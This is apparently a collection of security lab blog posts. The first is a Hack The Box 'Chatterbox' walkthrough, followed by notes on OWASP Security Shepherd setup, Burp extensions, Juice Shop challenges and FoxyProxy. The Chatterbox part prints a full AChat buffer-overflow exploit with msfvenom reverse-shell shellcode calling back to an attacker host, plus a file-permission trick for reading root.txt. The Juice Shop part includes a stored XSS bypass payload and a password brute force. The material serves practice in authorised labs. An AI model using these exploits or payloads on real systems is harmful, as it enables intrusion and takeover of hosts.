Hackthebox Chatterbox Walkthrough

placeholder

Explanation

Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
This is a walkthrough of a box “Chatterbox”.

Solution

1. Initial Enumeration

TCP Port Scanning:

root@kali:~# nmap -p- 10.10.10.74 -sC -sV
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-28 19:34 EET
Nmap scan report for 10.10.10.74
Host is up (0.045s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE VERSION
9255/tcp open  http    AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open  achat   AChat chat system

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 618.82 seconds

root@kali:~#

2. Getting User

By running searchsploit, we can find a vulnerability one is for the Metasploit, one is for the manual exploit.

root@kali:~# searchsploit achat
--------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                             |  Path
                                                                           | (/usr/share/exploitdb/)
--------------------------------------------------------------------------- ----------------------------------------
Achat 0.150 beta7 - Remote Buffer Overflow                                 | exploits/windows/remote/36025.py
Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit)                    | exploits/windows/remote/36056.rb
MataChat - 'input.php' Multiple Cross-Site Scripting Vulnerabilities       | exploits/php/webapps/32958.txt
Parachat 5.5 - Directory Traversal                                         | exploits/php/webapps/24647.txt
--------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

root@kali:~#

This time, the manual exploit script “36025.py” was used.
For this purpose, we need to create the payload for reverse shell at first.

root@kali:~# msfvenom -p windows/shell_reverse_tcp RHOST=10.10.10.74 LHOST=10.10.14.10 LPORT=4443 exitfunc=thread -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 774 (iteration=0)
x86/unicode_mixed chosen with final size 774
Payload size: 774 bytes
Final size of python file: 3767 bytes
buf =  b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += b"\x47\x42\x39\x75\x34\x4a\x42\x49\x6c\x6b\x38\x75\x32"
buf += b"\x6d\x30\x49\x70\x49\x70\x61\x50\x43\x59\x49\x55\x50"
buf += b"\x31\x55\x70\x30\x64\x44\x4b\x6e\x70\x30\x30\x72\x6b"
buf += b"\x51\x42\x4a\x6c\x64\x4b\x61\x42\x4b\x64\x32\x6b\x30"
buf += b"\x72\x4b\x78\x4a\x6f\x64\x77\x50\x4a\x4b\x76\x6c\x71"
buf += b"\x79\x6f\x46\x4c\x4f\x4c\x33\x31\x61\x6c\x7a\x62\x6c"
buf += b"\x6c\x6d\x50\x77\x51\x48\x4f\x5a\x6d\x6b\x51\x56\x67"
buf += b"\x47\x72\x5a\x52\x61\x42\x72\x37\x74\x4b\x30\x52\x4e"
buf += b"\x30\x42\x6b\x6e\x6a\x6d\x6c\x62\x6b\x50\x4c\x6b\x61"
buf += b"\x62\x58\x6a\x43\x50\x48\x4a\x61\x78\x51\x52\x31\x52"
buf += b"\x6b\x31\x49\x4f\x30\x7a\x61\x37\x63\x42\x6b\x61\x39"
buf += b"\x5a\x78\x37\x73\x6e\x5a\x6e\x69\x44\x4b\x30\x34\x44"
buf += b"\x4b\x7a\x61\x36\x76\x6d\x61\x59\x6f\x44\x6c\x59\x31"
buf += b"\x78\x4f\x6a\x6d\x49\x71\x59\x37\x4c\x78\x57\x70\x51"
buf += b"\x65\x4b\x46\x6d\x33\x61\x6d\x68\x78\x4d\x6b\x61\x6d"
buf += b"\x6f\x34\x31\x65\x7a\x44\x51\x48\x64\x4b\x6f\x68\x6c"
buf += b"\x64\x59\x71\x36\x73\x73\x36\x54\x4b\x7a\x6c\x30\x4b"
buf += b"\x62\x6b\x61\x48\x4d\x4c\x4a\x61\x56\x73\x42\x6b\x6c"
buf += b"\x44\x42\x6b\x6b\x51\x6a\x30\x52\x69\x4f\x54\x4d\x54"
buf += b"\x4f\x34\x6f\x6b\x6f\x6b\x63\x31\x52\x39\x71\x4a\x4e"
buf += b"\x71\x69\x6f\x47\x70\x6f\x6f\x6f\x6f\x71\x4a\x44\x4b"
buf += b"\x4a\x72\x7a\x4b\x52\x6d\x71\x4d\x50\x68\x50\x33\x4e"
buf += b"\x52\x59\x70\x6b\x50\x32\x48\x54\x37\x63\x43\x30\x32"
buf += b"\x4f\x6f\x62\x34\x43\x38\x6e\x6c\x71\x67\x4f\x36\x4b"
buf += b"\x57\x49\x6f\x36\x75\x74\x78\x54\x50\x6b\x51\x6d\x30"
buf += b"\x6b\x50\x4b\x79\x75\x74\x62\x34\x32\x30\x72\x48\x4b"
buf += b"\x79\x53\x50\x30\x6b\x6d\x30\x59\x6f\x68\x55\x52\x30"
buf += b"\x72\x30\x62\x30\x6e\x70\x31\x30\x30\x50\x4d\x70\x32"
buf += b"\x30\x43\x38\x37\x7a\x4c\x4f\x79\x4f\x67\x70\x59\x6f"
buf += b"\x37\x65\x32\x77\x4f\x7a\x4a\x65\x4f\x78\x6b\x5a\x6c"
buf += b"\x4a\x6c\x4e\x4a\x6a\x51\x58\x59\x72\x59\x70\x6a\x71"
buf += b"\x6f\x6b\x32\x69\x7a\x46\x62\x4a\x6c\x50\x31\x46\x4f"
buf += b"\x67\x43\x38\x32\x79\x54\x65\x70\x74\x63\x31\x79\x6f"
buf += b"\x56\x75\x74\x45\x67\x50\x54\x34\x6a\x6c\x6b\x4f\x50"
buf += b"\x4e\x4d\x38\x44\x35\x38\x6c\x4f\x78\x6c\x30\x34\x75"
buf += b"\x75\x52\x51\x46\x4b\x4f\x37\x65\x43\x38\x6f\x73\x70"
buf += b"\x6d\x6f\x74\x79\x70\x61\x79\x49\x53\x30\x57\x70\x57"
buf += b"\x71\x47\x70\x31\x68\x76\x61\x5a\x4c\x52\x32\x39\x6e"
buf += b"\x76\x47\x72\x39\x6d\x30\x66\x46\x67\x4f\x54\x6c\x64"
buf += b"\x6d\x6c\x4b\x51\x59\x71\x62\x6d\x4d\x74\x4b\x74\x4e"
buf += b"\x30\x46\x66\x79\x70\x4e\x64\x50\x54\x4e\x70\x71\x46"
buf += b"\x6e\x76\x62\x36\x71\x36\x6f\x66\x50\x4e\x52\x36\x51"
buf += b"\x46\x32\x33\x42\x36\x51\x58\x33\x49\x76\x6c\x4f\x4f"
buf += b"\x51\x76\x4b\x4f\x5a\x35\x43\x59\x57\x70\x30\x4e\x50"
buf += b"\x56\x6e\x66\x6b\x4f\x6e\x50\x43\x38\x7a\x68\x64\x47"
buf += b"\x6b\x6d\x53\x30\x59\x6f\x69\x45\x65\x6b\x57\x70\x4d"
buf += b"\x4d\x6c\x6a\x49\x7a\x33\x38\x73\x76\x65\x45\x45\x6d"
buf += b"\x63\x6d\x39\x6f\x57\x65\x4f\x4c\x4a\x66\x71\x6c\x39"
buf += b"\x7a\x61\x70\x4b\x4b\x69\x50\x72\x55\x79\x75\x37\x4b"
buf += b"\x61\x37\x4a\x73\x63\x42\x70\x6f\x52\x4a\x69\x70\x31"
buf += b"\x43\x39\x6f\x58\x55\x41\x41"

root@kali:~# 

Then, put the payload into the python exploit code.

import socket
import sys, time

buf =  b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += b"\x47\x42\x39\x75\x34\x4a\x42\x49\x6c\x6b\x38\x75\x32"
buf += b"\x6d\x30\x49\x70\x49\x70\x61\x50\x43\x59\x49\x55\x50"
buf += b"\x31\x55\x70\x30\x64\x44\x4b\x6e\x70\x30\x30\x72\x6b"
buf += b"\x51\x42\x4a\x6c\x64\x4b\x61\x42\x4b\x64\x32\x6b\x30"
buf += b"\x72\x4b\x78\x4a\x6f\x64\x77\x50\x4a\x4b\x76\x6c\x71"
buf += b"\x79\x6f\x46\x4c\x4f\x4c\x33\x31\x61\x6c\x7a\x62\x6c"
buf += b"\x6c\x6d\x50\x77\x51\x48\x4f\x5a\x6d\x6b\x51\x56\x67"
buf += b"\x47\x72\x5a\x52\x61\x42\x72\x37\x74\x4b\x30\x52\x4e"
buf += b"\x30\x42\x6b\x6e\x6a\x6d\x6c\x62\x6b\x50\x4c\x6b\x61"
buf += b"\x62\x58\x6a\x43\x50\x48\x4a\x61\x78\x51\x52\x31\x52"
buf += b"\x6b\x31\x49\x4f\x30\x7a\x61\x37\x63\x42\x6b\x61\x39"
buf += b"\x5a\x78\x37\x73\x6e\x5a\x6e\x69\x44\x4b\x30\x34\x44"
buf += b"\x4b\x7a\x61\x36\x76\x6d\x61\x59\x6f\x44\x6c\x59\x31"
buf += b"\x78\x4f\x6a\x6d\x49\x71\x59\x37\x4c\x78\x57\x70\x51"
buf += b"\x65\x4b\x46\x6d\x33\x61\x6d\x68\x78\x4d\x6b\x61\x6d"
buf += b"\x6f\x34\x31\x65\x7a\x44\x51\x48\x64\x4b\x6f\x68\x6c"
buf += b"\x64\x59\x71\x36\x73\x73\x36\x54\x4b\x7a\x6c\x30\x4b"
buf += b"\x62\x6b\x61\x48\x4d\x4c\x4a\x61\x56\x73\x42\x6b\x6c"
buf += b"\x44\x42\x6b\x6b\x51\x6a\x30\x52\x69\x4f\x54\x4d\x54"
buf += b"\x4f\x34\x6f\x6b\x6f\x6b\x63\x31\x52\x39\x71\x4a\x4e"
buf += b"\x71\x69\x6f\x47\x70\x6f\x6f\x6f\x6f\x71\x4a\x44\x4b"
buf += b"\x4a\x72\x7a\x4b\x52\x6d\x71\x4d\x50\x68\x50\x33\x4e"
buf += b"\x52\x59\x70\x6b\x50\x32\x48\x54\x37\x63\x43\x30\x32"
buf += b"\x4f\x6f\x62\x34\x43\x38\x6e\x6c\x71\x67\x4f\x36\x4b"
buf += b"\x57\x49\x6f\x36\x75\x74\x78\x54\x50\x6b\x51\x6d\x30"
buf += b"\x6b\x50\x4b\x79\x75\x74\x62\x34\x32\x30\x72\x48\x4b"
buf += b"\x79\x53\x50\x30\x6b\x6d\x30\x59\x6f\x68\x55\x52\x30"
buf += b"\x72\x30\x62\x30\x6e\x70\x31\x30\x30\x50\x4d\x70\x32"
buf += b"\x30\x43\x38\x37\x7a\x4c\x4f\x79\x4f\x67\x70\x59\x6f"
buf += b"\x37\x65\x32\x77\x4f\x7a\x4a\x65\x4f\x78\x6b\x5a\x6c"
buf += b"\x4a\x6c\x4e\x4a\x6a\x51\x58\x59\x72\x59\x70\x6a\x71"
buf += b"\x6f\x6b\x32\x69\x7a\x46\x62\x4a\x6c\x50\x31\x46\x4f"
buf += b"\x67\x43\x38\x32\x79\x54\x65\x70\x74\x63\x31\x79\x6f"
buf += b"\x56\x75\x74\x45\x67\x50\x54\x34\x6a\x6c\x6b\x4f\x50"
buf += b"\x4e\x4d\x38\x44\x35\x38\x6c\x4f\x78\x6c\x30\x34\x75"
buf += b"\x75\x52\x51\x46\x4b\x4f\x37\x65\x43\x38\x6f\x73\x70"
buf += b"\x6d\x6f\x74\x79\x70\x61\x79\x49\x53\x30\x57\x70\x57"
buf += b"\x71\x47\x70\x31\x68\x76\x61\x5a\x4c\x52\x32\x39\x6e"
buf += b"\x76\x47\x72\x39\x6d\x30\x66\x46\x67\x4f\x54\x6c\x64"
buf += b"\x6d\x6c\x4b\x51\x59\x71\x62\x6d\x4d\x74\x4b\x74\x4e"
buf += b"\x30\x46\x66\x79\x70\x4e\x64\x50\x54\x4e\x70\x71\x46"
buf += b"\x6e\x76\x62\x36\x71\x36\x6f\x66\x50\x4e\x52\x36\x51"
buf += b"\x46\x32\x33\x42\x36\x51\x58\x33\x49\x76\x6c\x4f\x4f"
buf += b"\x51\x76\x4b\x4f\x5a\x35\x43\x59\x57\x70\x30\x4e\x50"
buf += b"\x56\x6e\x66\x6b\x4f\x6e\x50\x43\x38\x7a\x68\x64\x47"
buf += b"\x6b\x6d\x53\x30\x59\x6f\x69\x45\x65\x6b\x57\x70\x4d"
buf += b"\x4d\x6c\x6a\x49\x7a\x33\x38\x73\x76\x65\x45\x45\x6d"
buf += b"\x63\x6d\x39\x6f\x57\x65\x4f\x4c\x4a\x66\x71\x6c\x39"
buf += b"\x7a\x61\x70\x4b\x4b\x69\x50\x72\x55\x79\x75\x37\x4b"
buf += b"\x61\x37\x4a\x73\x63\x42\x70\x6f\x52\x4a\x69\x70\x31"
buf += b"\x43\x39\x6f\x58\x55\x41\x41"

# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('10.10.10.74', 9256)

fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
p  = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40" 
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
p += buf + "A" * (1152 - len(buf))
p += "\x00" + "A"*10 + "\x00"

print "---->{P00F}!"
i=0
while i<len(p):
    if i > 172000:
        time.sleep(1.0)
    sent = sock.sendto(p[i:(i+8192)], server_address)
    i += sent
sock.close()

To achieve a reverse shell, we have to launch a netcat listener and run the custom exploit code.

root@kali:~# nc -nlvp 4443
listening on [any] 4443 ...
root@kali:~# python 36025.py 
---->{P00F}!

root@kali:~#

Now we got a reverse shell as a user “alfred”.

root@kali:~# nc -nlvp 4443
listening on [any] 4443 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.74] 49160
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
chatterbox\alfred

C:\Windows\system32>

“user.txt” is in the directory “C:\Users\Alfred\Desktop”.

C:\Users\Alfred\Desktop>type user.txt
type user.txt
72290246dfaedb1e3e3ac9d6fb306334

C:\Users\Alfred\Desktop>

3. Getting Root

We can figure out that we can go to the Admin directory even though we got just a general user.

C:\Users\Administrator\Desktop>whoami
whoami
chatterbox\alfred

C:\Users\Administrator\Desktop>type root.txt
type root.txt
Access is denied.

C:\Users\Administrator\Desktop>

By using “icacls” command, we can figure out Alfred has the following permission for the directory “C:\Users\Administrator”.

  1. Full Permission
  2. Object Inheritance (Permission for this folder and subfolders)
  3. Container Inheritance (Permission for files in this folder and subfolders)
C:\Users>icacls administrator
icacls administrator
administrator NT AUTHORITY\SYSTEM:(OI)(CI)(F)
              CHATTERBOX\Administrator:(OI)(CI)(F)
              BUILTIN\Administrators:(OI)(CI)(F)
              CHATTERBOX\Alfred:(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files

C:\Users>

On the other hand, Alfred doesn’t have any permission for “root.txt”

C:\Users\Administrator\Desktop>icacls root.txt
icacls root.txt
root.txt CHATTERBOX\Administrator:(F)

Successfully processed 1 files; Failed processing 0 files

C:\Users\Administrator\Desktop>

However, by the following command, we can figure out that root.txt is owned by Alfred.
I was wondering how “Q” is possible to be “ownership” but that’s how it is.

C:\Users\Administrator\Desktop>dir /Q
dir /Q
 Volume in drive C has no label.
 Volume Serial Number is 9034-6528

 Directory of C:\Users\Administrator\Desktop

12/10/2017  06:50 PM    <DIR>          BUILTIN\Administrators .
12/10/2017  06:50 PM    <DIR>          NT AUTHORITY\SYSTEM    ..
12/10/2017  06:50 PM                32 CHATTERBOX\Alfred      root.txt
               1 File(s)             32 bytes
               2 Dir(s)  17,933,189,120 bytes free

C:\Users\Administrator\Desktop>

According to the fact, we can change the file permission of “root.txt” to read it.

C:\Users\Administrator\Desktop>icacls root.txt /grant alfred:(F)   
icacls root.txt /grant alfred:(F)
processed file: root.txt
Successfully processed 1 files; Failed processing 0 files

C:\Users\Administrator\Desktop>icacls root.txt
icacls root.txt
root.txt CHATTERBOX\Alfred:(F)
         CHATTERBOX\Administrator:(F)

Successfully processed 1 files; Failed processing 0 files

C:\Users\Administrator\Desktop>type root.txt
type root.txt
a673d1b1fa95c276c5ef2aa13d9dcc7c
C:\Users\Administrator\Desktop>

Running OWASP Security Shepherd with Docker compose on Kali 2019.4

placeholder

Explanation

OWASP Security Shepherd is a vulnerable web application for the practice.
Unlike other vulnerable webapp like DVWA, Juice Shop, WebGoat,

  1. has also challenges for mobile app security
  2. focuses on the vulnerability of web application “spec”. not like ordinary XSS, SQLi and so on.
  3. more focused on learning local proxy(like Burp Suite), request validation

We have several ways to set up this platform but this time Docker compose was used.
This is a personal memo for the setup procedure.

Environment

  • OS: Kali linux 2019.4
  • Docker: 19.03.4
  • OWASP Security Shepherd: v3.2

Solution

1. Installing prerequisits

root@kali:~# apt-get install docker.io docker-compose default-jdk maven

---

root@kali:~# git clone https://github.com/OWASP/SecurityShepherd.git

2. Initial setup

root@kali:~# cd SecurityShepherd/

root@kali:~/SecurityShepherd# mvn -Pdocker clean install -DskipTests

root@kali:~/SecurityShepherd# service docker start

root@kali:~/SecurityShepherd# docker-compose up -d # -d for get terminal back

---

3. Login

placeholder We can use the following credential for login.

admin:password

After that, change the current password. placeholder

Now we can start the challenges.
By clicking “Get Next Challenge”, we cam proceed to the challenges. placeholder

First challenge is for the HTTP request modification with local proxy. placeholder

4. Select Open Floor mode

To see all challenges, we have to change the mode to the “Open Floor mode”.
Click “Admin” and go to “Module Management” -> “Challenge Module Layout”.
Enable the “Open Floor mode” by clicking the button. placeholder

5. Remove Docker container

# stop all docker containers
root@kali:~/SecurityShepherd# docker-compose stop

# remove all docker containers
root@kali:~/SecurityShepherd# docker-compose down

# remove all docker containers and Security Shepherd images
root@kali:~/SecurityShepherd# docker-compose down --rmi all

# rebuild
root@kali:~/SecurityShepherd# docker-compose build

---

root@kali:~/SecurityShepherd# docker-compose up -d

Install Burp extension reflector

Explanation

To automate the reflected XSS finding process, install a burp extension “Reflector”

Environment

  • OS: Kali linux 2019.4
  • Burp Suite: Burp Suite Community Edition v2.1.04
  • Plugin: reflector 2.1

Solution

1. Setting up Burp Suite

At first, download the .jar file from https://github.com/elkokc/reflector/releases. placeholder

Then launch Burp Suite and go to “Extender” -> “Extensions” tab.
Click “Add” and set “reflector2.1” as “Extension file”. placeholder

Now we had new tab “Reflector”. placeholder

Writeup of OWASP Juice Shop 2 stars challenge

Explanation

OWASP Juice Shop is one of the vulnerable application from OWASP written in Node.js, Express and Angular for the practice.
The application contains a vast number of hacking challenges from 1 star challenge to 5 star challenges.
This is a writeup of 2 stars challenge. placeholder

Environment

  • OS: Kali linux 2019.4
  • OWASP Juice Shop: v9.3.0

Solution

1. Admin Section

Access the administration section of the store.

This is kinda guessing task.
By accessing the http://localhost:3000/#/administration, we can achieve the purpose. placeholder

2. Classic Stored XSS

Prerequisite

login as a user

Perform an XSS attack with <script>alert(xss)</script> on a legacy page within the application.

Login as any user and go to http://localhost:3000/#/profile.
Set “<script>alert(‘xss’)</script>” as a Username and submit. We can get the following output. placeholder

This sanitaization is not enough.
By setting the following payload, we can execute stored XSS.

<<script>ascript>alert('xss')</script>

3. Deprecated Interface

Prerequisite

login as a user

Use a deprecated B2B interface that was not properly shut down.

Go to http://localhost:3000/#/complain.
By sending XML file, we can achieve this challenge.

root@kali:~# cat note.xml 
<note nighteye="disabled">
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend!</body>
</note>

root@kali:~# 

4. Five-Star Feedback

Prerequisite

login as a user

Get rid of all 5-star customer feedback.

After logged in, go to http://localhost:3000/#/administration which we found in the previous challenge. By clicking the trash bins, delete the 5-star feedback. placeholder

5. Login Admin

Log in with the administrator’s user account.

The login console has SQL injection.
Go to http://localhost:3000/#/login and use following username and random password for login credential.
we can login as a user “admin@juice-sh.op”. placeholder

6. Login MC SafeSearch

Log in with MC SafeSearch’s original user credentials without applying SQL Injection or any other bypass.

Guessing task I don’t like.
If we google the word ‘MC SafeSearch’, we can find this video.
In this video, we can find out that the name of MC’s dog is “Mr.Noodles”.
With the following credential, we can login as a user “mc.safesearch”.

mc.safesearch@juice-sh.op:Mr. N00dles

7. Password Strength

Prerequisite

2 star Challenge 5: “Login Admin”

Log in with the administrator’s user credentials without previously changing them or applying SQL Injection.

If the prerequisite is done already, we already know the username is “admin@juice-sh.op”.
Launch Burp Suite and go to http://localhost:3000/#/login, try to login with random password.
Then, We can find the following traffic. placeholder

This time, use Burp Intruder.
At first, right click the traffic and go to “Send to Intruder”.
Specify just “password” with the tab “Positions”. placeholder

Next, go to “Paylad” tab. Load “/usr/share/durb/wordlists/others/best1050.txt”. placeholder

Then, start attack placeholder

By filtering, we can find the correct password “admin123”. placeholder

8. Security Policy

Prerequisite

login as a user

Behave like any “white-hat” should before getting into the action.

We have to just go to “Account” -> “Privacy & Security” -> “Privacy Policy”. placeholder

9. View Basket

Prerequisite

login as a user

View another user’s shopping basket.

Launch Burp Suite and open the page http://localhost:3000/#/basket.
We can find the following traffic. By changing the sending uri to “/rest/basket/2”(With Burp Repeater or whatever), we can clear the challenge. placeholder

10. Weird Crypto

Prerequisite

login as a user

Inform the shop about an algorithm or library it should definitely not use the way it does.

We can send the following message and it completes the challenge. placeholder

Burp interception for localhost application with FoxyProxy

Explanation

To use Burp interception just for the localhost application, install browser extension “FoxyProxy”
This time, “FoxyProxy” was used for OWASP Juice Shop on the localhost:3000.

Environment

  • OS: Kali linux 2019.4
  • Burp Suite: Burp Suite Community Edition v2.1.04
  • Browser: Google Chrome 78.0.3904.108 (Official Build) (64-bit)
  • FoxyProxy: FoxyProxy Standard 3.0.7.1

Solution

1. Installing FoxyProxy

At first, go to the Chrome webstore and install Chrome extension FoxyProxy. placeholder

2. Launch Burp Suite

Next, launch Burp Suite.
This time, default setting (IP: 127.0.0.1, port: 8080) was used. placeholder

3. Edit “/etc/hosts”

Add following line to the “/etc/hosts” to give an additional name “juice-shop” for localhost.
(We can’t use the name “localhost” for this purpose.)

127.0.0.1 juice-shop

4. Setup FoxyProxy

Then, open the extension icon on the right of Chrome header and select “options”
Click “add New Proxy” and open the “Proxy settings” window.
Go to “Proxy Details” and set configuration for running Burp Suite. placeholder

Next, go to “URL Patterns” and “Add new pattern”.
We can use Wildcard for the domain name for the proxy. placeholder

Finally, go to top page of FoxyProxy configuration and enable the proxy configuration.
Choose “Use proxies based on their pre-defined patterns and priorities” as Proxy mode. placeholder

5. Check the configuration with Burp Suite.

Access “http://sec-juice:3000” with Google Chrome and take a look at “HTTP history” tab on Burp Suite.
We can confirm that we can analyze the traffic to localhost. placeholder